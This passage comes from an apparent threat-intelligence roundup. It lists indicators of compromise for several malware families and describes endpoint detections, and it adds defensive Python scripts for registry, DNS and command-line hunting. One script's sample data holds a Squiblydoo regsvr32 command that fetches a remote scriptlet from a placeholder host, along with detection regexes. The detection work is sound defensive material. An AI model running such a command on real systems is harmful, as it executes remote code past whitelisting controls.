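            data: Union[str, int] = UNESCAPE.sub(r"\1", raw[1:-1])
        elif raw.lower().startswith("dword:"):
            data = int(raw[6:], 16)
        else:
            data = raw
        yield key, name, data


def hunt(entries) -> List[str]:
    """Return one finding per entry that matches a pattern from the roundup's tables."""
    findings = []
    for key, name, data in entries:
        k = key.lower()
        leaf = key.rsplit("\\", 1)[-1]
        if "\\services\\" in k and name.lower() == "imagepath":
            if RANDOM_SERVICE.match(leaf) and RANDOM_SYSWOW64_DIR.match(str(data)):
                findings.append(f"random service {leaf} runs {data}")
        elif k.endswith("windows defender\\exclusions\\paths"):
            if RANDOM_SYSWOW64_DIR.match(name):
                findings.append(f"Defender exclusion for {name}")
        elif "policies\\microsoft\\windows defender" in k:
            if name in DEFENDER_POLICY_OFF and data == 1:
                findings.append(f"Defender disabled by policy: {name}")
        elif k.endswith("policies\\system") and name == "DisableTaskMgr" and data == 1:
            findings.append("Task Manager disabled (DisableTaskMgr=1)")
        elif k.endswith("currentversion\\run") and HEX32.match(name):
            findings.append(f"Run value with hash-like name {name} -> {data}")
    return findings


def hunt_reg(text: str) -> List[str]:
    """Convenience wrapper: parse a .reg export and return the findings."""
    return hunt(parse_reg(text))


if __name__ == "__main__":
    for finding in hunt_reg(SAMPLE_REG):
        print(finding)
```

The point of matching on shape rather than on the exact names in the tables is that every Tofsee sample here chose a different service name and SysWOW64 directory; the ImagePath and the Defender exclusion pointing at the same freshly created eight-letter directory is the stable part.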
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
239[.]255[.]255[.]250 38
172[.]217[.]10[.]100 38
69[.]55[.]5[.]252 38
43[.]231[.]4[.]6/31 38
85[.]114[.]134[.]88 38
217[.]172[.]179[.]54 38
5[.]9[.]72[.]48 38
130[.]0[.]232[.]208 38
144[.]76[.]108[.]82 38
185[.]253[.]217[.]20 38
45[.]90[.]34[.]87 38
157[.]240[.]18[.]174 35
52[.]223[.]241[.]7 26
69[.]31[.]136[.]5 24
99[.]84[.]104[.]9 23
104[.]83[.]228[.]247 22
104[.]47[.]54[.]36 21
23[.]218[.]146[.]162 20
216[.]239[.]38[.]21 17
104[.]47[.]53[.]36 17
216[.]239[.]36[.]21 16
96[.]114[.]157[.]80 13
12[.]167[.]151[.]116/30 13
37[.]1[.]217[.]172 13
176[.]58[.]123[.]25 12

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
schema[.]org 38
microsoft-com[.]mail[.]protection[.]outlook[.]com 38
252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 38
252[.]5[.]55[.]69[.]in-addr[.]arpa 38
252[.]5[.]55[.]69[.]bl[.]spamcop[.]net 38
252[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 38
252[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 38
252[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 38
www[.]amazon[.]com 29
video-weaver[.]lax03[.]hls[.]ttvnw[.]net 26
native-ps3[.]np[.]ac[.]playstation[.]net 24
api[.]sendspace[.]com 24
account[.]np[.]ac[.]playstation[.]net 20
work[.]a-poster[.]info 13
sso[.]godaddy[.]com 10
doi[.]org 10
www[.]google[.]pl 9
ip[.]pr-cy[.]hacklix[.]com 9
mta7[.]am0[.]yahoodns[.]net 7
mta6[.]am0[.]yahoodns[.]net 7
blo[.]pool-pay[.]com 7
mta5[.]am0[.]yahoodns[.]net 6
ipinfo[.]io 6
mailin-03[.]mx[.]aol[.]com 6
www[.]google[.]co[.]uk 5

*See JSON for more IOCs

Files and/or directories created | Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 38
%SystemRoot%\SysWOW64\config\systemprofile:.repos 38
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 38
%TEMP%\<random, matching '[a-z]{8}'>.exe 36
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) 18
\Documents and Settings\LocalService:.repos 10
%System32%\config\systemprofile:.repos 8
%SystemRoot%\SERVIC~2\Local Settings\AppData\Local\Temp\MpCmdRun.log 8
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 6
%System32%\ommzntm\lnizqkrk.exe (copy) 1
%System32%\vkwynaf\tkdgnaml.exe (copy) 1

File Hashes
*See JSON for more IOCs
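The Tofsee domain rows above contain a tell that survives any change of C2 address: every sample queried 252[.]5[.]55[.]69 under zen.spamhaus.org, sbl-xbl.spamhaus.org, bl.spamcop.net, cbl.abuseat.org and dnsbl.sorbs.net. That is the bot's own egress address, 69.55.5.252, written in reverse, and the lookups are the spam module checking whether it is blocklisted before it starts sending. The same rows show an MX lookup for a large mail provider's inbound host, which is how the bot finds where to deliver directly. Mail servers do both of these; user workstations do neither. The Python script below is an added example, not Talos code, that flags both behaviours in resolver logs. The log format, the client addresses, the egress IP and the mail-host allow list are constructed for the demo.

```python
"""Spot spam-bot DNS behaviour: DNSBL self-checks and MX lookups from workstations (added example)."""
import ipaddress
import re
from collections import namedtuple

# Zones seen in the Tofsee rows above; extend with local knowledge (assumption).
DNSBL_ZONES = ("zen.spamhaus.org", "sbl-xbl.spamhaus.org", "bl.spamcop.net",
               "cbl.abuseat.org", "dnsbl.sorbs.net")

# Constructed resolver log format: "<time> <client> query <qname> <qtype>".
QUERY = re.compile(r"^\S+\s+(\d{1,3}(?:\.\d{1,3}){3})\s+query\s+(\S+)\s+(\S+)$")
Signal = namedtuple("Signal", "client kind detail self_check")

# Constructed sample log (demo data only).
LOGS = [
    "2020-10-21T10:00:00Z 10.0.0.5 query 252.5.55.69.zen.spamhaus.org A",
    "2020-10-21T10:00:00Z 10.0.0.5 query 252.5.55.69.bl.spamcop.net A",
    "2020-10-21T10:00:01Z 10.0.0.5 query 252.5.55.69.in-addr.arpa PTR",
    "2020-10-21T10:00:02Z 10.0.0.5 query microsoft-com.mail.protection.outlook.com MX",
    "2020-10-21T10:00:03Z 10.0.0.25 query 4.3.2.1.zen.spamhaus.org A",
    "2020-10-21T10:00:04Z 10.0.0.7 query www.amazon.com A",
]


def dnsbl_target(qname):
    """For '<d>.<c>.<b>.<a>.<zone>' return (zone, 'a.b.c.d'); None otherwise."""
    q = qname.rstrip(".").lower()
    for zone in DNSBL_ZONES:
        if q.endswith("." + zone):
            labels = q[: -len(zone) - 1].split(".")
            if len(labels) == 4:
                try:
                    return zone, str(ipaddress.ip_address(".".join(reversed(labels))))
                except ValueError:
                    return None
    return None


def find_spambot_signals(log_lines, egress_ip, mail_hosts=()):
    """Return Signals for DNSBL lookups and MX queries from hosts that are not MTAs.

    self_check is True when a host asks a blocklist about the site's own
    egress address, which is what the Tofsee samples above did.
    """
    out = []
    for line in log_lines:
        m = QUERY.match(line)
        if not m:
            continue
        client, qname, qtype = m.groups()
        if client in mail_hosts:          # legitimate mail servers do this all day
            continue
        target = dnsbl_target(qname)
        if target:
            zone, ip = target
            out.append(Signal(client, "dnsbl", f"{zone} for {ip}", ip == egress_ip))
        elif qtype.upper() == "MX":
            out.append(Signal(client, "mx", qname, False))
    return out


if __name__ == "__main__":
    for s in find_spambot_signals(LOGS, "69.55.5.252", mail_hosts=("10.0.0.25",)):
        print(s)
```

A workstation that both self-checks against a blocklist and resolves MX records within a few seconds is sending mail directly, and on most corporate networks that alone justifies pulling the host.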

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Ponystealer-9778326-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys | Occurrences
<HKCU>\Software\Microsoft\<random, matching '[A-Z][a-z]{3,11}'> 5
<HKCU>\SOFTWARE\WINRAR 1
<HKCU>\SOFTWARE\MICROSOFT\UTAHS
Value Name: Suzon
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Ekofdawok
1
<HKCU>\SOFTWARE\MICROSOFT\UTAHS
Value Name: Kafoxu
1
<HKCU>\SOFTWARE\MICROSOFT\UXIQ
Value Name: Yrysfi
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Potiitohl
1
<HKCU>\SOFTWARE\MICROSOFT\UXIQ
Value Name: Zehouh
1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
Value Name: F
1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
Value Name: F
1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
Value Name: F
1
<HKCU>\SOFTWARE\WINRAR
Value Name: HWID
1
<HKU>\S-1-5-21-2580483871-590521980-3826313501-500 1
Mutexes | Occurrences
Local\35D8253BA10246EEC3E9D1EC1BDDD619 1
Global\578A424AC350219FF94B6557217F62A2 1
Local\AC1918A6507EF2FE5D98AA93E2A2778E 1
Global\DDC946F02322AF31B67B36A6FA248481 1
Local\A789F961596210A0B67B36A6FA248481 1
Global\03EC5FE8FD07B629B67B36A6FA248481 1
Global\18215B65E6CAB2A4B67B36A6FA248481 1
Global\3FC4E099C12F0958B67B36A6FA248481 1
Global\54535CFFAAB8B53EB67B36A6FA248481 1
Global\6AFD17129416FED304DC821D4883303A 1
Global\6AFD17129416FED30CDD821D4082303A 1
Global\6AFD17129416FED320DD821D6C82303A 1
Global\6AFD17129416FED324D8821D6887303A 1
Global\6AFD17129416FED324DE821D6881303A 1
Global\6AFD17129416FED334DD821D7882303A 1
Global\6AFD17129416FED338DF821D7480303A 1
Global\6AFD17129416FED36CDC821D2083303A 1
Global\6AFD17129416FED36CDF821D2080303A 1
Global\6AFD17129416FED37CDC821D3083303A 1
Global\6AFD17129416FED384D9821DC886303A 1
Global\6AFD17129416FED384DA821DC885303A 1
Global\6AFD17129416FED38CD9821DC086303A 1
Global\6AFD17129416FED390DC821DDC83303A 1
Global\6AFD17129416FED398DC821DD483303A 1
Global\6AFD17129416FED39CDC821DD083303A 1

*See JSON for more IOCs

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
204[.]79[.]197[.]200 1
174[.]127[.]78[.]72 1
125[.]140[.]114[.]7 1
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
bountymarine[.]net 1
autocuga-mx[.]com 1
www[.]autocuga-mx[.]com 1
wonforhall[.]com 1
Files and/or directories created | Occurrences
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 5
%TEMP%\LcwvlrrRdE.ini 1
%TEMP%\KKlfw2HNHy.ini 1
%TEMP%\8oEbk1juft.ini 1
%TEMP%\tmpdec106f9.bat 1
%APPDATA%\Afpiqyyr 1
%APPDATA%\Afpiqyyr\uhowcahyv.ysg 1
%APPDATA%\Noagraofgito 1
%APPDATA%\Noagraofgito\ewmyvaufoze.exe 1
%APPDATA%\Ogsaudqic 1
%APPDATA%\Ogsaudqic\ihgoatzyew.hen 1
%APPDATA%\Fenybaanydr 1
%APPDATA%\Fenybaanydr\giywhylogu.ohw 1
%APPDATA%\Sopyhuawx 1
%APPDATA%\Sopyhuawx\tykikeuql.exe 1
%APPDATA%\Zoqyvuxeka 1
%APPDATA%\Zoqyvuxeka\ocephadokea.ahv 1
%APPDATA%\Durowualdi 1
%APPDATA%\Durowualdi\uburimwi.loi 1
%APPDATA%\Dyfagyowq 1
%APPDATA%\Dyfagyowq\ygdairtiosi.exe 1
%APPDATA%\Siuzohiwgu 1
%APPDATA%\Siuzohiwgu\vyyvvauryc.qya 1
%TEMP%\tmp1db35bfa.bat 1
%APPDATA%\Awipnadaidi 1

*See JSON for more IOCs

File Hashes

050126f14e024840eafa639a0894ced4a7605e56eb412243dd0d17c88491fa6c
188542fa96069c79302a1c53b1c00ed8768b8a64c87a375dfa963072b4dbe761
1bbc165f8d7ab75d45c95e43e63b8c09d6515914fd03f76a80802937f866c5d5
2d3a5291d3668bcb9424c6363c677b148ef4268112da486f730fce09f5ae3c46
4ad5f3e296bd64e439d044eff0cd72ae951935ab641a0369c2ee0a498b02bd6f
66b46477dd5744f315d844280614027d04af1b5fb6777c46d4a6479307fdf3f4
8722d5820b103d6f2e8f856914789b1c7408c7afaf8dbd68c08e9896edec5405
97c28f5ed8212dc79f904bc6dcb65d34e8fb14f4361619873a2fd223ffcd7a04
a37f13674568dbbaae22b6ec946719399fb79ca8bc696cf90a4e36515dc12e16
a98c894a526286a4b4bdccd23a5ef79f027e3d001d9c438e806c3bedd5d98970
ad03fe98fd16efb84c188eae75b6190287dab4a24a1f35769ad2557730bafbec
b62fc770a37f971c2f7aae2a9d6b3a0c16c7ff1f3adaeabe89e6dc294c3a4654

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

ThreatGrid


MITRE ATT&CK


Win.Trojan.Zegost-9778522-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svñhîst
12
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
172[.]217[.]9[.]238 12
172[.]217[.]197[.]113 1
172[.]217[.]197[.]100 1
172[.]217[.]197[.]139 1
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
srawslorpower[.]com 12

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

ThreatGrid


MITRE ATT&CK


Win.Worm.Aspxor-9778626-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 260 samples
Mutexes | Occurrences
2GVWNQJz1 260
Djjwy&22bsqobnaHhdGwemvt(&11839) 260
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
222[.]124[.]166[.]12 163
209[.]170[.]120[.]163 163
46[.]55[.]222[.]24 160
93[.]186[.]181[.]62 159
217[.]115[.]50[.]228 156
82[.]116[.]211[.]16 155
186[.]115[.]122[.]67 155
194[.]85[.]183[.]2 153
172[.]217[.]197[.]101 1
172[.]217[.]197[.]139 1
172[.]217[.]197[.]84 1
173[.]194[.]206[.]94 1
74[.]125[.]155[.]201 1
173[.]194[.]184[.]43 1
Files and/or directories created | Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 260
%HOMEPATH%\Local Settings\Application Data\ptdxnxxl.exe 1

File Hashes

02f64d25c1580ba78e6fa8c383624f0e013fded13b0270eea5b19289a0139578
04f22e454b8c0513fe128ff6fc8e1f47a4ab94bfdf2e99d4569f3bf9a23c9173
050f72354d23146cee3292124488dad9b353c4bba763f4b6833e12c316edbb7f
059f5cea45f0a3abdfd2fce4bec7f585ca6005d7191ef2e8b6987188940951aa
06023d6436712615722f2f0b22f33fa2225de04657b1da7778677e8e43f6502a
06ee84631e2023ab4c6b8c526465dec6787afbda023616eefdd7ec629797094f
07abd29f43412c8429289a7f10e64c7c4442ef3ef4d89437a7ad375d2083d3ab
07d3b2ac65941e96a6204081879d765d8ca4440133e2233fd6ef1c1f79245ae2
08319bcf3ddbe2506cd04dd1199f4cb27ecd0abe03947a4a185b5d825d99980b
0a61db38db8e1039dda95b072812b15ef7fb63c4666337529f0eb763a03d6ed6
0aa51018dbf43ab07477c5cd1a3e526fd37d2f27a0691b86440ba6bf4a2cb129
0c5274e9e9f4f8bf10444d637de28293c5737534baf82f15e064571fade3c8e1
0d7b107a54c1e03899de667102b1da7c6f2a27b8f5add13c48586ddb8758df0d
0ddc55ab67d64bd31ddbc935b9ee8773b70c7f8a3d499948621b22e4c590a56c
0de8a5c5897475c73187a789edb74670e64092985c673cdd2369871023da90cb
0df529097c03f46d2c200c7a06e9f0358c41a3ca7f1d9b893fd6646ccdcb7e1f
0eae1f1d65ed95073547c50f94fe7ca44c7a0d2e81b1b02a77dcf394a8f41276
0f6edeca6c82b6164c98d3da76a27bcca24059bf3fe6a76ac474b43b71e1e165
10a17284afe88ea1903eccdeccb517de70a5d1757925623a9ee0414b35f15b6a
11195cdd234075d4a4addae581393805909796fc032b78316e18d18fbae941e6
115f6c582609733ab9fc143bb9182bf0f3015407a269fda5d71ff019205fd2c3
123395b127ee5c4b5561d596f4f4615067358c6a13314a911a6cb51428f042e7
14ea8070cc476985510b4010eab52f83ee860b34a0ee0be5377d67cd000df8fc
164c19756de93c5770ba2a8ad5b92fc513b1605859a93131451c92ab4faf96a7
16614eb1b8702cc4450115b76777afc099fc710d737eab76a50fd09a4943b370

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


MITRE ATT&CK


Win.Packed.Lokibot-9778864-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: newapp
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nwama
1
Mutexes | Occurrences
3749282D282E1E80C56CAE5A 5
9DAA44F7C7955D46445DC99B 5
A16467FA-7343A2EC-6F235135-4B9A74AC-F1DC8406A 3
Global\fd3820c1-0745-11eb-887e-00501e3ae7b6 1
A2CF1074-2C1AFDB0-AF235135-4A69628B-BADA1D134 1
A2CF10742-C1AFDB0A-F2351354-673F0738-6A4AEFB0 1
A2CF1074-2C1AFDB0-AF235135-4516CC7A-45878301E 1
A2CF1074-2C1AFDB0-AF235135-448865A5-C4F91E2D6 1
A2CF1074-2C1AFDB0-AF235135-4407E0A3-F4F8912B9 1
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
204[.]79[.]197[.]200 3
195[.]69[.]140[.]147 3
72[.]21[.]81[.]240 1
43[.]254[.]17[.]15 1
54[.]235[.]182[.]194 1
23[.]21[.]126[.]66 1
8[.]249[.]245[.]254 1
136[.]144[.]237[.]217 1
23[.]21[.]252[.]4 1
207[.]154[.]254[.]218 1
103[.]253[.]212[.]224 1
82[.]165[.]248[.]254 1
212[.]54[.]132[.]65 1
207[.]154[.]240[.]23 1
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
elb097307-934924932[.]us-east-1[.]elb[.]amazonaws[.]com 2
api[.]ipify[.]org 2
ctldl[.]windowsupdate[.]com 2
cpanel[.]com 1
cs11[.]wpc[.]v0cdn[.]net 1
auto[.]au[.]download[.]windowsupdate[.]com[.]c[.]footprint[.]net 1
alifmedical[.]shop 1
smithandwollensky[.]com[.]tw 1
Files and/or directories created | Occurrences
%APPDATA%\D282E1 5
%APPDATA%\D282E1\1E80C5.lck 5
%APPDATA%\7C7955\5D4644.lck 5
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\sales.vbs 2
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 2
%APPDATA%\newapp\newapp.exe 1
%TEMP%\nwama\nwama.exe 1
%TEMP%\40B9E22A\api-ms-win-core-namedpipe-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-processenvironment-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-processthreads-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-processthreads-l1-1-1.dll 1
%TEMP%\40B9E22A\api-ms-win-core-profile-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-rtlsupport-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-string-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-synch-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-synch-l1-2-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-sysinfo-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-timezone-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-core-util-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-crt-conio-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-crt-convert-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-crt-environment-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-crt-filesystem-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-crt-heap-l1-1-0.dll 1
%TEMP%\40B9E22A\api-ms-win-crt-locale-l1-1-0.dll 1

*See JSON for more IOCs

File Hashes
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Fareit trojan has been detected - (16334)
Behavior associated with Fareit has been detected. Fareit is an information-stealing trojan that can send sensitive data back to an attacker from the victim machine.
Process hollowing detected - (5058)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before the child runs, its memory is cleared and replaced with the unpacked contents from the parent instead.
Dealply adware detected - (2771)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
CVE-2019-0708 detected - (481)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Installcore adware detected - (453)
InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.
Gamarue malware detected - (251)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Excessively long PowerShell command detected - (227)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
Crystalbit-Apple DLL double hijack detected - (223)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
Squiblydoo application whitelist bypass attempt detected - (183)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker-controlled server.
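As an added illustration (this is not Talos code and is not part of the original roundup), the following Python script runs the two endpoint heuristics described above, the excessively long PowerShell command line and the Squiblydoo regsvr32 pattern, over a handful of constructed process-creation records. The record format (image, tab, command line), the 1,000-character length threshold, and the host name placeholder.invalid are assumptions made for the example; the encoded-command switch prefixes and the scrobj.dll marker are the publicly documented forms of these techniques.

```python
import re
from dataclasses import dataclass

# Assumed threshold for "excessively long"; tune to the command lines seen
# in your own environment before using this in production.
LONG_CMDLINE_THRESHOLD = 1000

# Constructed sample process-creation events (not real telemetry): one
# "image<TAB>command line" record per line.  The long PowerShell record is
# padded with a repeated placeholder rather than a real encoded script, and
# the regsvr32 record points at an .invalid host.
SAMPLE_EVENTS = "\n".join([
    "C:\\Windows\\System32\\notepad.exe\tnotepad.exe C:\\Users\\user\\notes.txt",
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "powershell.exe -NoProfile -Command Get-Process",
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "powershell.exe -nop -w hidden -enc " + "QUFB" * 400,
    "C:\\Windows\\System32\\regsvr32.exe\t"
    "regsvr32.exe /s C:\\Program Files\\Vendor\\component.dll",
    "C:\\Windows\\System32\\regsvr32.exe\t"
    "regsvr32.exe /s /n /u /i:http://placeholder.invalid/payload.sct scrobj.dll",
])

# PowerShell accepts any unique prefix of -EncodedCommand (-e, -ec, -en, ...).
ENCODED_SWITCH = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?(?:\s|$)")
# Squiblydoo: the /i: switch of regsvr32 carrying a remote URL.
REMOTE_SCRIPTLET = re.compile(r"/i:\s*\"?https?://")


@dataclass
class Finding:
    rule: str
    image: str
    reason: str


def parse_events(text):
    """Split the constructed record format into (image, command line) pairs."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        image, _, cmdline = line.partition("\t")
        events.append((image, cmdline))
    return events


def check_powershell(image, cmdline):
    """Flag PowerShell launches whose command line exceeds the threshold."""
    if not image.lower().endswith("powershell.exe"):
        return None
    if len(cmdline) <= LONG_CMDLINE_THRESHOLD:
        return None
    reason = f"command line length {len(cmdline)} > {LONG_CMDLINE_THRESHOLD}"
    if ENCODED_SWITCH.search(cmdline.lower()):
        reason += "; encoded command switch present"
    return Finding("long_powershell_command", image, reason)


def check_regsvr32(image, cmdline):
    """Flag regsvr32 launches that fetch a scriptlet from a remote URL."""
    if not image.lower().endswith("regsvr32.exe"):
        return None
    lowered = cmdline.lower()
    if not REMOTE_SCRIPTLET.search(lowered):
        return None
    reason = "/i: switch references a remote URL"
    if "scrobj.dll" in lowered:
        reason += "; scrobj.dll used as the registered module"
    return Finding("squiblydoo_regsvr32", image, reason)


def scan(text):
    """Run every heuristic over every event and collect the findings."""
    findings = []
    for image, cmdline in parse_events(text):
        for check in (check_powershell, check_regsvr32):
            finding = check(image, cmdline)
            if finding is not None:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule}: {f.image} ({f.reason})")
```

Both rules deliberately ignore the benign records: a short interactive PowerShell command and a regsvr32 call that registers a local DLL without the /i: switch produce no finding. The length threshold is the main tuning knob; administrative scripts in some environments legitimately exceed 1,000 characters, so the encoded-command note in the reason string is there to help an analyst prioritise rather than to gate the alert.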
Bluestacks adware detected - (96)
Bluestacks adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware.